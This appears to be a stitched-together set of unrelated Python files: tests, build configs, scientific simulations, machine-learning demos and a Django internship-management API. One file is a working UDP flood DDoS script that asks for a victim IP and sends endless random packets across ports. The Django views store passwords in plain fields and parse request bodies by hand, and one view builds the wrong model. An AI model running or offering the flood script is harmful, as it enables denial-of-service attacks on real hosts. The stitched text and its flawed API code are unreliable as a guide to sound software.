def test_article_text_alternatives_mode_file_location_must_choose_graphic_with_xlink_href_not_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="" />
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
img = html.xpath(
'//div[@class="modal-body"]/img[@src="'
'1234-5678-rctb-45-05-0110-e01.png'
'"]'
)
self.assertTrue(len(img) > 0)
img = html.xpath(
'//div[@class="modal-body"]/img[@src="'
'1234-5678-rctb-45-05-0110-e01.jpg'
'"]'
)
self.assertTrue(len(img) == 0)
def test_article_text_alternatives_chooses_graphic_with_no_scielo_web_and_no_content_type_because_xlink_href_is_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" xlink:href="" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
img_tag = html.xpath(
'//div[@class="modal-body"]/img[@src="'
'1234-5678-rctb-45-05-0110-e01.png'
'"]'
)
self.assertTrue(len(img_tag) > 0)
def test_article_text_alternatives_chooses_graphic_with_no_scielo_web_and_no_content_type_because_xlink_href_is_absent(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
<graphic specific-use="scielo-web" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
img_tag = html.xpath(
'//div[@class="modal-body"]/img[@src="'
'1234-5678-rctb-45-05-0110-e01.jpg'
'"]'
)
self.assertTrue(len(img_tag) > 0)
|
from conans import ConanFile, tools
import os
import shutil
class TestPackageConan(ConanFile):
settings = "os", "arch", "compiler", "build_type"
exports_sources = "hello.c", "text.s"
_targets = ("c64", "apple2")
def build(self):
if not tools.cross_building(self.settings):
for src in self.exports_sources:
shutil.copy(os.path.join(self.source_folder, src), os.path.join(self.build_folder, src))
for target in self._targets:
output = "hello_{}".format(target)
tools.mkdir(target)
try:
# Try removing the output file to give confidence it is created by cc65
os.unlink(output)
except FileNotFoundError:
pass
self.run("{p} -O -t {t} hello.c -o {t}/hello.s".format(p=os.environ["CC65"], t=target))
self.run("{p} -t {t} {t}/hello.s -o {t}/hello.o".format(p=os.environ["AS65"], t=target))
self.run("{p} -t {t} text.s -o {t}/text.o".format(p=os.environ["AS65"], t=target))
self.run("{p} -o {o} -t {t} {t}/hello.o {t}/text.o {t}.lib".format(o=output, p=os.environ["LD65"], t=target))
def test(self):
if not tools.cross_building(self.settings):
for target in self._targets:
assert os.path.isfile("hello_{}".format(target))
|
from sklearn import datasets
from sklearn.cluster import KMeans
from sklearn.cluster import DBSCAN
# load data
iris = datasets.load_iris()
x = iris.data
x = (x-x.min(axis=0))/(x.max(axis=0)-x.min(axis=0))
y = iris.target
fig = plt.figure(figsize=(15,5))
# original distribution
plt.subplot(131)
plt.scatter([xi[2] for xi in x],[xi[3] for xi in x],c=y)
plt.title('Origin')
# K-means cluster
plt.subplot(132)
y_pred = KMeans(n_clusters=3).fit_predict(x)
plt.scatter([xi[2] for xi in x],[xi[3] for xi in x],c=y_pred)
plt.title('K-means')
# DBSCAN cluster
plt.subplot(133)
y_pred = DBSCAN(eps = 0.1, min_samples = 5).fit_predict(x)
plt.scatter([xi[2] for xi in x],[xi[3] for xi in x],c=y_pred)
plt.title('DBSCAN')
plt.show()
|
import api_permission_mappings_api9 as api9
import api_permission_mappings_api10 as api10
import api_permission_mappings_api14 as api14
import api_permission_mappings_api15 as api15
import api_permission_mappings_api16 as api16
import api_permission_mappings_api17 as api17
import api_permission_mappings_api18 as api18
import api_permission_mappings_api19 as api19
import api_permission_mappings_api21 as api21
import api_permission_mappings_api22 as api22
AOSP_PERMISSIONS_MAPPINGS = {
"9" : {"AOSP_PERMISSIONS_BY_METHODS" : api9.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api9.AOSP_PERMISSIONS_BY_FIELDS},
"10" : {"AOSP_PERMISSIONS_BY_METHODS" : api10.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api10.AOSP_PERMISSIONS_BY_FIELDS},
"14" : {"AOSP_PERMISSIONS_BY_METHODS" : api14.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api14.AOSP_PERMISSIONS_BY_FIELDS},
"15" : {"AOSP_PERMISSIONS_BY_METHODS" : api15.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api15.AOSP_PERMISSIONS_BY_FIELDS},
"16" : {"AOSP_PERMISSIONS_BY_METHODS" : api16.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api16.AOSP_PERMISSIONS_BY_FIELDS},
"17" : {"AOSP_PERMISSIONS_BY_METHODS" : api17.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api17.AOSP_PERMISSIONS_BY_FIELDS},
"18" : {"AOSP_PERMISSIONS_BY_METHODS" : api18.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api18.AOSP_PERMISSIONS_BY_FIELDS},
"19" : {"AOSP_PERMISSIONS_BY_METHODS" : api19.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api19.AOSP_PERMISSIONS_BY_FIELDS},
"21" : {"AOSP_PERMISSIONS_BY_METHODS" : api21.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api21.AOSP_PERMISSIONS_BY_FIELDS},
"22" : {"AOSP_PERMISSIONS_BY_METHODS" : api22.AOSP_PERMISSIONS_BY_METHODS, "AOSP_PERMISSIONS_BY_FIELDS" : api22.AOSP_PERMISSIONS_BY_FIELDS},
}
|
import os
from setuptools import find_packages, setup # noqa: H301
NAME = "svix-ksuid"
VERSION = "0.6.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = [
"python-baseconv",
]
with open(os.path.join(os.path.dirname(__file__), "README.md")) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name=NAME,
version=VERSION,
description=" A pure-Python KSUID implementation",
author="Svix",
author_email="development@svix.com",
url="https://github.com/svixhq/python-ksuid/",
license="MIT",
keywords=[
"svix",
"ksuid",
],
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development",
"Typing :: Typed",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
python_requires=">=3.6",
install_requires=REQUIRES,
zip_safe=False,
packages=find_packages(exclude=["test", "tests"]),
package_data={
"": ["py.typed"],
},
long_description=README,
long_description_content_type="text/markdown",
)
|
# Example of a mailing list manager
# We can run a testing SMTP server using:
# python3 -m smtpd -n -c DebuggingServer localhost:1025
from collections import defaultdict
from contextlib import suppress
from send_email import send_email
class MailingList:
"Manage groups of e-mail addresses for sending e-mails."
def __init__(self, data_file):
self.data_file = data_file
self.email_map = defaultdict(set)
def add_to_group(self, email, group):
self.email_map[email].add(group)
def emails_in_groups(self, *groups):
groups = set(groups)
emails = set()
for email, group in self.email_map.items():
if group.intersection(groups):
emails.add(email)
return emails
def send_mailing(self, subject, message, from_addr, *groups, headers=None):
emails = self.emails_in_groups(*groups)
send_email(subject, message, from_addr, *emails, headers=headers)
def save(self):
with open(self.data_file, "w") as file:
for email, groups in self.email_map.items():
file.write("{} {}\n".format(email, ",".join(groups)))
def load(self):
# reset the dictionary in case it contains data
# from a previous call to this function
self.email_map = defaultdict(set)
with suppress(IOError): # catch any I/O error and ignore them
with open(self.data_file) as file:
for line in file:
# use strip to remove the newline character
email, groups = line.strip().split(" ")
groups = set(groups.split(","))
self.email_map[email] = groups
def __enter__(self):
self.load()
return self
def __exit__(self, type, value, traceback):
self.save()
# Examples:
# create some addresses and groups and save them to a file
m = MailingList("addresses.db")
m.add_to_group("friend1@mail.com", "friends")
m.add_to_group("family1@mail.com", "friends")
m.add_to_group("family1@mail.com", "family")
m.save()
# load the saved addresses and groups into a new mailing list
m2 = MailingList("addresses.db")
m2.email_map # defaultdict(set, {})
m2.load()
m2.email_map
# defaultdict(set,
# {'friend1@mail.com': {'friends'},
# 'family1@mail.com': {'family', 'friends'}})
|
import numpy as np
import multiprocessing as mp
import pyfftw
from numpy import pi, exp, sqrt, sin, cos, conj, arctan, tanh, tan
from numpy import heaviside as heav
from include import helper
import h5py
# ---------Spatial and potential parameters--------------
Mx = My = 64
Nx = Ny = 128 # Number of grid pts
dx = dy = 1 / 2 # Grid spacing
dkx = pi / (Mx * dx)
dky = pi / (My * dy) # K-space spacing
len_x = Nx * dx # Box length
len_y = Ny * dy
x = np.arange(-Mx, Mx) * dx
y = np.arange(-My, My) * dy
X, Y = np.meshgrid(x, y) # Spatial meshgrid
data = h5py.File('../data/splitting_dipole_data.hdf5', 'a')
data.create_dataset('grid/x', x.shape, data=x)
data.create_dataset('grid/y', y.shape, data=y)
kx = np.fft.fftshift(np.arange(-Mx, Mx) * dkx)
ky = np.fft.fftshift(np.arange(-My, My) * dky)
Kx, Ky = np.meshgrid(kx, ky) # K-space meshgrid
# Initialising FFTs
cpu_count = mp.cpu_count()
wfn_data = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
fft_forward = pyfftw.FFTW(wfn_data, wfn_data, axes=(0, 1), threads=cpu_count)
fft_backward = pyfftw.FFTW(wfn_data, wfn_data, direction='FFTW_BACKWARD', axes=(0, 1), threads=cpu_count)
# Framework for wavefunction data
psi_plus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
psi_0_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
psi_minus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
# Controlled variables
V = 0. # Doubly periodic box
p = q = 0.
c0 = 2
c1 = 0.5 # Effective 3-component BEC
k = 0 # Array index
# ------------------------------ Generating SQV's -------------------------
# Euler angles
alpha = 0.
beta = pi / 4
gamma = 0.
N_vort = 2 # Number of vortices
pos = [-10, 0, 10, 0]
theta_k = np.empty((N_vort, Nx, Ny))
theta_tot = np.empty((Nx, Ny))
for k in range(N_vort // 2):
# Scaling positional arguments
Y_minus = 2 * pi * (Y - pos[k]) / len_y
X_minus = 2 * pi * (X - pos[N_vort // 2 + k]) / len_x
Y_plus = 2 * pi * (Y - pos[N_vort + k]) / len_y
X_plus = 2 * pi * (X - pos[3 * N_vort // 2 + k]) / len_x
x_plus = 2 * pi * pos[3 * N_vort // 2 + k] / len_x
x_minus = 2 * pi * pos[N_vort // 2 + k] / len_x
for nn in np.arange(-5, 5):
theta_k[k, :, :] += arctan(
tanh((Y_minus + 2 * pi * nn) / 2) * tan((X_minus - pi) / 2)) \
- arctan(tanh((Y_plus + 2 * pi * nn) / 2) * tan((X_plus - pi) / 2)) \
+ pi * (heav(X_plus, 1.) - heav(X_minus, 1.))
theta_k[k, :, :] -= (2 * pi * Y / len_y) * (x_plus - x_minus) / (2 * pi)
theta_tot += theta_k[k, :, :]
# Initial wavefunction
Psi = np.empty((3, Nx, Ny), dtype='complex128')
Psi[0, :, :] = np.zeros((Nx, Ny)) + 0j
Psi[1, :, :] = np.ones((Nx, Ny), dtype='complex128') * exp(1j * theta_tot)
Psi[2, :, :] = np.zeros((Nx, Ny)) + 0j
psi_plus, psi_0, psi_minus = helper.rotation(Psi, Nx, Ny, alpha, beta, gamma) # Performs rotation to wavefunction
# Aligning wavefunction to potentially speed up FFTs
pyfftw.byte_align(psi_plus)
pyfftw.byte_align(psi_0)
pyfftw.byte_align(psi_minus)
# ------------------------------------------------------------------------
# Normalisation constants
N_plus = dx * dy * np.linalg.norm(psi_plus) ** 2
N_0 = dx * dy * np.linalg.norm(psi_0) ** 2
N_minus = dx * dy * np.linalg.norm(psi_minus) ** 2
# Time steps, number and wavefunction save variables
Nt = 80000
Nframe = 200
dt = 5e-3
t = 0.
# Saving time variables:
data.create_dataset('time/Nt', data=Nt)
data.create_dataset('time/dt', data=dt)
data.create_dataset('time/Nframe', data=Nframe)
# Setting up variables to be sequentially saved:
psi_plus_save = data.create_dataset('wavefunction/psi_plus', (Nx, Ny, Nt/Nframe), dtype='complex128')
psi_0_save = data.create_dataset('wavefunction/psi_0', (Nx, Ny, Nt/Nframe), dtype='complex128')
psi_minus_save = data.create_dataset('wavefunction/psi_minus', (Nx, Ny, Nt/Nframe), dtype='complex128')
for i in range(Nt):
# Spin vector terms:
F_perp = sqrt(2.) * (conj(psi_plus) * psi_0 + conj(psi_0) * psi_minus)
Fz = abs(psi_plus) ** 2 - abs(psi_minus) ** 2
F = sqrt(abs(Fz) ** 2 + abs(F_perp) ** 2) # Magnitude of spin vector
# Total density
n = abs(psi_minus) ** 2 + abs(psi_0) ** 2 + abs(psi_plus) ** 2
# Sin and cosine terms for solution
C = cos(c1 * F * (-1j * dt))
if F.min() == 0:
S = np.zeros((Nx, Ny), dtype='complex128') # Ensures no division by zero
else:
S = 1j * sin(c1 * F * (-1j * dt)) / F
# Forward FFTs
fft_forward(psi_plus, psi_plus_k)
fft_forward(psi_0, psi_0_k)
fft_forward(psi_minus, psi_minus_k)
# Computing kinetic energy + quadratic Zeeman
psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny)
psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
# Inverse FFTs
fft_backward(psi_plus_k, psi_plus)
fft_backward(psi_0_k, psi_0)
fft_backward(psi_minus_k, psi_minus)
# Rescaling
psi_plus *= (Nx * Ny)
psi_0 *= (Nx * Ny)
psi_minus *= (Nx * Ny)
# Trap, linear Zeeman & interaction flow
psi_plus = ((C - S * Fz) * psi_plus - 1. / sqrt(2.) * S * conj(F_perp) * psi_0) * exp(-dt * (V - p + c0 * n))
psi_0 = (-1. / sqrt(2.) * S * F_perp * psi_plus + C * psi_0 - 1. / sqrt(2.) * S * conj(F_perp) * psi_minus) \
* exp(-dt * (V + c0 * n))
psi_minus = (-1. / sqrt(2.) * S * F_perp * psi_0 + (C + S * Fz) * psi_minus) * exp(-dt * (V + p + c0 * n))
# Forward FFTs
fft_forward(psi_plus, psi_plus_k)
fft_forward(psi_0, psi_0_k)
fft_forward(psi_minus, psi_minus_k)
# Computing kinetic energy + quadratic Zeeman
psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny)
psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
# Inverse FFTs
fft_backward(psi_plus_k, psi_plus)
fft_backward(psi_0_k, psi_0)
fft_backward(psi_minus_k, psi_minus)
# Rescaling
psi_plus *= (Nx * Ny)
psi_0 *= (Nx * Ny)
psi_minus *= (Nx * Ny)
# Renormalizing wavefunction
psi_plus *= sqrt(N_plus) / sqrt(dx * dy * np.linalg.norm(psi_plus) ** 2)
psi_0 *= sqrt(N_0) / sqrt(dx * dy * np.linalg.norm(psi_0) ** 2)
psi_minus *= sqrt(N_minus) / sqrt(dx * dy * np.linalg.norm(psi_minus) ** 2)
# Prints current time and saves data to an array
if np.mod(i, Nframe) == 0:
print('it = %1.4f' % t)
psi_plus_save[:, :, k] = psi_plus[:, :]
psi_0_save[:, :, k] = psi_0[:, :]
psi_minus_save[:, :, k] = psi_minus[:, :]
k += 1
t += dt
data.close()
|
#from src.evaluation.test import test
from training.train import train
session_name = train("batch16")
# test(session_name=session_name, is_visualize=False)
# test(session_name='test', is_visualize=True)
|
#-*-coding:utf8;-*-
#qpy:console
import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
os.system("figlet D.H.C ddos")
print
print "Author : JOSELUCAS"
print "TEAM : D.H.C "
print "github : https://github.com/joselucas257/D.H.C_team"
ip = raw_input("ip da vitima : ")
port = input("Porta recomendado 80 : ")
os.system("clear")
os.system("figlet iniciando attack ")
print "[ ] 0% "
time.sleep(5)
print "[===== ] 25%"
time.sleep(5)
print "[========== ] 50%"
time.sleep(5)
print "[=============== ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1 |
from ..common.optim import SGD as optimizer
from ..common.coco_schedule import lr_multiplier_1x as lr_multiplier
from ..common.data.coco_keypoint import dataloader
from ..common.models.keypoint_rcnn_fpn import model
from ..common.train import train
model.backbone.bottom_up.freeze_at = 2
train.init_checkpoint = "detectron2://ImageNetPretrained/MSRA/R-50.pkl"
|
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.models import User
from rest_framework.views import APIView
from rest_framework import generics
from rest_framework.response import Response
from rest_framework import status
from api.serializers import CompanySerializer
from api.serializers import StudentSerializer
from api.serializers import TrainingProgramSerializer
from api.serializers import StudentApplicationSerializer
from api.serializers import ListTrainingsSerializer
from api.serializers import LoginSerializer
from api.serializers import TrainingProgramSerializer_CView
from api.serializers import SignUpSerializer
#from api.serializers import SfqSerializer
#from api.serializers import SfcSerializer
#from api.serializers import SfoSerializer
from api.models import Student
from api.models import Company
from api.models import TrainingProgram
from api.models import StudentApplications
from api.models import login_db
#from api.models import student_feedback_questions
#from api.models import student_feedback_choice
#from api.models import student_feedback_options
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth import authenticate
from django.contrib.auth import login
from django.contrib.auth import logout
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from django.http import JsonResponse
from json import JSONEncoder
import json
class login(APIView):
def get(self, request, format=None):
serializer = LoginSerializer(data=request.data)
if serializer.is_valid():
userAuth = authenticate(username=serializer.data['email'], password=serializer.data['password'])
if userAuth:
return Response(status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def post(self, request, format=None):
# return Response(request.body)
try:
data = json.loads(str(request.body)[2:-1])
username = data['email']
password = data['password']
except:
val = str(request.body)[2:-1].split("&")
username = val[0].split('=')[1]
password = val[1].split('=')[1]
userAuth = authenticate(username=username,password=password)
if userAuth:
obj = User.objects.get(username=username)
serializer = SignUpSerializer(obj)
return Response(serializer.data)
return Response(status="status.HTTP_400_BAD_REQUEST")
# class login(APIView):
# """
# login
# URL: [ip]:8000/login/
# Method: POST
# Parameters: email, password
# Output:
# Description:
# Login Method
# """
# def post(self, request, format=None):
# return HttpResponse("Hello")
class logout(APIView):
"""
"""
def post(self, request, format=None):
logout(request)
class add_company(APIView):
"""
add_company
URL: [ip]:8000/api/addcompany/
Method: POST
Parameters: company_name,
address1,
address2,(optional)
city,
state,
pin,
mobile,
telephone,(optional)
description,
website,(optional)
email,
password
Description
API to create a new company profile.
"""
def post(self, request, format=None):
req_data = request.body
data = {}
try:
data = json.loads(str(req_data)[2:-1])
except:
val = str(request.body)[2:-1].split("&")
for i in val:
i = i.split('=')
data[i[0]]=i[1]
obj = Student(company_name=data['company_name'],
address1=data['address1'],
address2=data['address2'],
city= data['city'],
state = data['state'],
pin= data['pin'],
mobile= data['mobile'],
email = data['email'],
description=data['description'],
website=data['website'],
password=data['password'],
)
obj.save()
# user = User.objects.create_user(obj['email'],obj['email'],obj['password'])
return HttpResponse(obj)
# serializer = CompanySerializer(data=data)
# if serializer.is_valid():
# serializer.save()
# return Response(serializer.data, status=status.HTTP_201_CREATED)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)@login_required
class company_details(LoginRequiredMixin,APIView):
"""
company_details
URL: [ip]:8000/api/company/[company_id]/
Method: GET
Parameters: id,
company_name,
address1,
address2,(optional)
city,
state,
pin,
mobile,
telephone,(optional)
description,
website,(optional)
email
Output:
Description:
API to get the details about a company given its company_id
"""
def post(self,request,pk,format=None):
companyobj = Company.objects.get(id=pk)
serializer = CompanySerializer(companyobj)
return Response(serializer.data)
def get(self,request,pk,format=None):
companyobj = Company.objects.get(id=pk)
serializer = CompanySerializer(companyobj)
return Response(serializer.data)
class add_student(APIView):
"""
add_student
URL: [ip]:8000/api/addstudent/
Method: POST
Parameters: first_name,
last_name,
gender,
email,
password,
college,
city,
state,
graduation_year,
mobile,
telephone
Output:
Description:
API to create a new student account/profile.
"""
def post(self, request, format=None):
req_data = str(request.body)[2:-1]
data = {}
try:
data = json.loads(req_data)
except:
val = str(request.body)[2:-1].split("&")
for i in val:
i = i.split('=')
data[i[0]]=i[1]
obj = Student(email=data['email'],
first_name=data['first_name'],
last_name=data['last_name'],
gender= data['gender'],
college = data['college'],
city = data['city'],
graduation_year= data['graduation_year'],
mobile = data['mobile'],
)
obj.save()
# user = User.objects.create_user(obj['email'],obj['email'],obj['password'])
return HttpResponse(obj)
#return Response("Error", status=status.HTTP_400_BAD_REQUEST)
class student_details(APIView):
"""
student_details
URL: [ip]:8000/api/student/[student_id]/
Method: GET
Parameters: id,
first_name,
last_name,
gender,
email,
college,
city,
state,
graduation_year,
mobile,
telephone
Output:
Description:
API to retrieve student details given the student id.
"""
def get(self,request,pk,format=None):
studentobj = Student.objects.get(id=pk)
serializer = StudentSerializer(studentobj)
return Response(serializer.data)
def post(self,request,pk,format=None):
studentobj = Student.objects.get(id=pk)
serializer = StudentSerializer(studentobj)
return Response(serializer.data)
class add_training(APIView):
"""
add_training
URL: [ip]:8000/api/addtraining/
Method: POST
Parameters: training_name,
description,
eligibility,
company,
start_date,
duration,
stipend,
deadline
Output:
Description:
API to create a new training program
"""
def post(self, request, format=None):
req_data = str(request.body)[2:-1]
data = {}
try:
data = json.loads(req_data)
except:
val = str(request.body)[2:-1].split("&")
for i in val:
i = i.split('=')
data[i[0]]=i[1]
obj = TrainingProgram(training_name=data['training_name'],
description=data['description'],
eligibility=data['eligibility'],
company= Company.objects.get(id=data['company']),
start_date = data['start_date'],
duration = data['duration'],
stipend= data['stipend'],
deadline = data['deadline'],
)
obj.save()
# user = User.objects.create_user(obj['email'],obj['email'],obj['password'])
return HttpResponse(obj)
class list_trainings(APIView):
"""
list_trainings
URL: [ip]:8000/api/listtrainings/
Method: GET
Parameters: id,
training_name,
company,
company_name,
start_date,
stipend,
deadline
Description:
API to list all training availabiilities
"""
def get(self,request,format=None):
listOfTrainings = TrainingProgram.objects.filter(status="published")
serializer = ListTrainingsSerializer(listOfTrainings, many=True)
return Response(serializer.data)
def post(self,request, format=None):
listOfTrainings = TrainingProgram.objects.filter(status="published")
serializer = ListTrainingsSerializer(listOfTrainings, many=True)
return Response(serializer.data)
class all_trainings(APIView):
"""
list_trainings
URL: [ip]:8000/api/listtrainings/
Method: GET
Parameters: id,
training_name,
company,
company_name,
start_date,
stipend,
deadline
Description:
API to list all training availabiilities
"""
def get(self,request,format=None):
listOfTrainings = TrainingProgram.objects.all()
serializer = ListTrainingsSerializer(listOfTrainings, many=True)
return Response(serializer.data)
def post(self,request, format=None):
listOfTrainings = TrainingProgram.objects.all()
serializer = ListTrainingsSerializer(listOfTrainings, many=True)
return Response(serializer.data)
class training_approval(APIView):
"""
training_approval
URL: [ip]:8000/api/approve/[id]
Method: POST
Parameters:
"""
def get(self,request,pk,format=None):
pk = int(pk)
approval_status = pk%10
pk = pk//10
trainingObj = TrainingProgram.objects.get(id=pk)
if approval_status == 1:
trainingObj.status="published"
else:
trainingObj.status="discarded"
trainingObj.save()
return HttpResponse(trainingObj)
def post(self,request,pk,format=None):
pk = int(pk)
approval_status = pk%10
pk = pk//10
trainingObj = TrainingProgram.objects.get(id=pk)
if approval_status == 1:
trainingObj.status="published"
else:
trainingObj.status="discarded"
trainingObj.save()
return HttpResponse(trainingObj)
class training_details(APIView):
"""
training_details
URL: [ip]:8000/api/training/[training_id]/
Method: GET
Parameters: id,
training_name,
description,
eligibility,
company,
start_date,
duration,
stipend,
deadline,
applicants_count,
Description:
API to list details about the Training program, given the id.
"""
def get(self, request, pk, format=None):
training = TrainingProgram.objects.get(id=pk)
serializer = TrainingProgramSerializer(training)
return Response(serializer.data)
def post(self, request, pk, format=None):
training = TrainingProgram.objects.get(id=pk)
serializer = TrainingProgramSerializer(training)
return Response(serializer.data)
class application_status(APIView):
"""
application_status
URL:
Method: GET
Parameters: id,
training(id),
student(is=d),
status
Note:
1 -> Processing Application
2 -> MCQ Screening
3 -> Interview Process
4 -> Company Matched
5 -> Internship Started
6 -> Completed Internship
7 -> Stipend Recieved
-ve -> Rejected
Description:
API to view the status of Student Application
"""
def get(self, request, pk, format=None):
application = StudentApplications.objects.get(id=pk)
serializer = StudentApplicationSerializer(application)
return Response(serializer.data)
def post(self, request, pk, format=None):
application = StudentApplications.objects.get(id=pk)
serializer = StudentApplicationSerializer(application)
return Response(serializer.data)
class apply_training(APIView):
"""
apply_training
URL: [ip]:8000/api/apply/
Method: POST
Parameters: training(id)
student(id)
Descripiton:
API to hit when student applies for an internship
"""
def post(self, request, format=None):
data = {}
req_data = str(request.body)[2:-1]
try:
data = json.loads(req_data)
return HttpResponse("Try Block")
except:
val = req_data
#return Response(req_data)
temp = val.split('&')
for i in temp:
i = i.split('=')
data[i[0]]=i[1]
serializer = StudentApplicationSerializer(data=data)
if serializer.is_valid():
# serializer.data['training'] = data['training']
# serializer.data['student'] = data['student']
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class company_view_training(APIView):
"""
Description:
API returns all applied training programs by the company, latest first
"""
def get(self,request,pk,format=None):
training_list = TrainingProgram.objects.all().filter(company_id=pk)
serializer = TrainingProgramSerializer_CView(training_list, many=True)
return Response(serializer.data)
def post(self,request,pk,format=None):
training_list = TrainingProgram.objects.all().filter(id=pk)
serializer = TrainingProgramSerializer_CView(training_list, many=True)
return Response(serializer.data)
class postStudentFeedback(APIView):
def post(self,request,format=None):
data = {}
req_data = str(request.body)[2:-1]
return HttpResponse("Response") |
from gpitch.matern12_spectral_mixture import MercerMatern12sm
from gpitch.myplots import plot_predict
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import gpitch
import gpflow
def per_fun(xin, npartials, freq):
"""Function to generate sum os sines"""
f = np.zeros(xin.shape)
for i in range(npartials):
f += np.sin(2 * np.pi * xin * (i+1) * freq)
return f/np.max(np.abs(f))
# generate data
n = 16000 # number of samples
fs = 16000 # sample frequency
x = np.linspace(0., (n-1.)/fs, n).reshape(-1, 1)
component = per_fun(xin=x, npartials=3, freq=15.)
envelope = np.exp(-25 * (x - 0.33) ** 2) + np.exp(-75 * (x - 0.66) ** 2)
envelope /= np.max(np.abs(envelope))
noise_var = 0.000001
y = component * envelope + np.sqrt(noise_var) * np.random.randn(component.size, 1)
# use maxima as inducing points
z, u = gpitch.init_liv(x=x, y=y, win_size=31, thres=0.05, dec=1)
# init kernels
kact = gpflow.kernels.Matern32(input_dim=1, lengthscales=1.0, variance=1.0)
enr = np.array([1., 1., 1.])
frq = np.array([15., 30., 45.])
kcom = MercerMatern12sm(input_dim=1, energy=enr, frequency=frq)
kern = [[kact], [kcom]]
# init model
m = gpitch.pdgp.Pdgp(x=x.copy(), y=y.copy(), z=z, kern=kern, minibatch_size=100)
m.za.fixed = True
m.zc.fixed = True
# optimization
method = tf.train.AdamOptimizer(learning_rate=0.005)
m.optimize(method=method, maxiter=1000)
# predict
xtest = x[::4].copy()
mu_a, var_a, mu_c, var_c, m_src = m.predict_act_n_com(xtest)
# plot results
plt.figure(figsize=(12, 8))
plt.subplot(3, 1, 1)
plt.plot(xtest, m_src[0], lw=2)
plt.plot(z[0][0], u, 'o', mfc="none", ms=7, mew=2)
plt.plot(x, y, 'k--')
plt.legend(['prediction', 'maxima data (ind. points)', 'data'])
plt.subplot(3, 1, 2)
plt.plot(x, envelope, 'k--')
plt.legend(['envelope'], loc=1)
plt.twinx()
plot_predict(x=xtest, mean=mu_a[0], var=var_a[0], z=m.za[0].value, latent=True)
plt.legend(['prediction', 'inducing points'], loc=2)
plt.subplot(3, 1, 3)
plt.plot(x, component, 'k--')
plt.legend(['component'], loc=1)
plt.twinx()
